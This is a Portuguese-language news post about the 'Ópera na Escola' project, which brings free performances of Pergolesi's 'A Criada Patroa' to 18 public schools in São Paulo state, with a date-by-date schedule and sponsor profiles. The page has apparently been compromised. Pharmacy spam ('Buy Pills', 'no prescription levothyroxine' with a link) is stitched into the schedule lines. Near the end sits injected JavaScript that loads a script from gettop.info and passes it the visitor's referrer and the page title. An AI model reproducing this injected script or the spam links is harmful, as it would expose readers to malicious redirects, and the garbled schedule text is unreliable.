ÓperaProgramaçãoSão Paulo

Ópera gratuita chega a escolas públicas de São Paulo e interior paulista

Ao todo, 18 escolas públicas do Estado de São Paulo recebem as apresentações do espetáculo “A Criada Patroa” (La serva padrona)

 

Disseminar a música erudita para alunos das escolas públicas do estado de São de Paulo e seus familiares é a proposta do Projeto “Ópera na Escola”, que estreou no dia 13 de setembro, às 11 horas, na escola Padre Bernardo Murphy, em Mogi das Cruzes (SP). O espetáculo foi apresentado por cantores líricos que, através da interpretação da música,  traduzem as emoções da história contada na ópera cômica “A Criada Patroa”, escrita pelo italiano Giovanni Battista Pergolesi.

O Projeto pretende tornar possível o primeiro contato de muitas crianças e seus familiares com o gênero musical operístico. Ao todo, 18 escolas receberão as apresentações, que têm entrada gratuita. O “Ópera na Escola” é idealizado por Cleia Mangueira, com realização da Tulipa Produções Artísticas e conta com o patrocínio da Gerdau, por meio do Instituto Gerdau, firmado através da Lei Estadual de Incentivo à Cultura – ProAC.

Para que os alunos possam compreender a importância da música erudita como expressão artística no Brasil e no mundo, o Projeto realiza ações socioeducativas que abrangem as escolas e o seu entorno. Além das crianças e familiares receberem informações sobre o espetáculo e a música erudita, os alunos também desenvolvem atividades didáticas relacionadas à Ópera.

A ópera “A Criada Patroa” conta a história dos criados Serpina e Vespone, que fazem de tudo para que seu patrão Uberto se apaixone pela empregada. A cantora Isabella Luchi, o barítono Marcio Marangon e o ator Rodrigo Manzelli compõem o elenco, que tem direção musical assinada por Fábio Bezutti.

Para a idealizadora e diretora do Projeto “Ópera na Escola”, Cleia Mangueira, projetos como esse são importantes para a expansão dos horizontes culturais das crianças e jovens: “Nossa ideia sempre foi oferecer música com qualidade ao público infantil e juvenil; mais do que isso, que eles tivessem a oportunidade de apreciar e aprender novos valores culturais. A ópera nos pareceu muito interessante pelo fato de que a maioria dos alunos da rede pública e as comunidades carentes de ações culturais simplesmente não têm acesso à música erudita”.

As apresentações começam em Mogi das Cruzes e até outubro percorrem a capital paulista, São Caetano do Sul, Cotia, Araçariguama, Guarulhos, Pindamonhangaba e São José dos Campos.

 

Confira as datas e cidades que receberão as apresentações do projeto Ópera na Escola

 

Dia 13/9 – Mogi das Cruzes Buy Pills

– Às 11h00 – EE Padre Bernardo Murphy

– Às 15h00 – EE Paulo Ferrari Massaro

 

Dia 14/9 – São Paulo

– Às 11h00 – EE Prof Mário Casassanta

– Às 15h00 – EE Doutor Álvaro de Souza Lima

 

Dia 20/9 – São Caetano do Sul

– Às 11h00 – EE Padre Alexandre Grigolli

 

Dia 20/9 – São Paulo

– Às 15h00 – EE Dr. Genésio de Almeida Moura

 

online Buy Dia 21/9 – Cotia

– Às 11h00 – EM Prof Roberto Jorge Haddock Lobo Netto

– Às 15h00 – EE Tenente Ernesto Caetano de Souza

 

Dia 27/9 – Araçariguama

– Às 11h00 – EE Humberto Victorazzo

 

no prescription levothyroxine http://www.moragehotel.net/?p=3501 Dia 28/9 – Guarulhos

– Às 11h00 – EE Cidade Soimco II

– Às 15h00 – EE Profa Zilda Romeiro Pinto Moreira da Silva

 

Dia 11/10 – Pindamonhangaba compazine generic equivalent

– Às 11h00 – EE Profa Antônia Carlota Gomes

– Às 15h00 – EE Profa Dirce Leopoldina Cintra Villas Boas

 

Dia 12/10 – Araçariguama

– Às 11h00 – E.M.E.I.F Jorge Amado

 

Dia 18/10 – Pindamonhangaba Purchase

– Às 11h00 – EE Prof Eunice Bueno Romeiro

– Às 15h00 – EE Profa Yolanda Bueno de Godoy

 

Dia 19/10 – São José dos Campos

– Às 11h00 – EE Eng. Edgar Mello Mattos De Castro

– Às 15h00 – EE Prof. Xenofonte Strabão de Castro

 


Sobre a Tulipa Produções Artísticas

A produtora foi fundada por profissionais que atuam na gestão, administração e produção cultural de médio e grande porte e realiza projetos nas áreas de música erudita, ópera, teatro e artes plásticas. Dentre os principais projetos, são destaques as produções operísticas Il Matrimonio Segreto (coprodução com Ato Primo Produções Culturais), A WaterBird Talk, The Bear, I Pagliacci, realizadas no Theatro São Pedro, e L’Enfant et les Sortilèges para comemoração do Centenário do Theatro Municipal de São Paulo. Por esse último projeto, conquistou o Prêmio Carlos Gomes 2012 como melhor produção operística.

 

Sobre a Gerdau

A Gerdau é líder no segmento de aços longos nas Américas e uma das principais fornecedoras de aços longos especiais do mundo. Recentemente, passou também a atuar em dois novos mercados no Brasil, com a produção própria de aços planos e a expansão das atividades de minério de ferro, iniciativas que estão ampliando o mix de produtos oferecidos ao mercado e a competitividade de suas operações. Com mais de 45 mil colaboradores, a Gerdau possui operações industriais em 14 países – nas Américas, na Europa e na Ásia –, as quais somam uma capacidade instalada superior a 25 milhões de toneladas de aço por ano. Além disso, é a maior recicladora da América Latina e, no mundo, transforma, anualmente, milhões de toneladas de sucata em aço, reforçando seu compromisso com o desenvolvimento sustentável das regiões onde atua. Com mais de 120 mil acionistas, as ações das empresas Gerdau estão listadas nas bolsas de valores de São Paulo, Nova Iorque e Madri.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.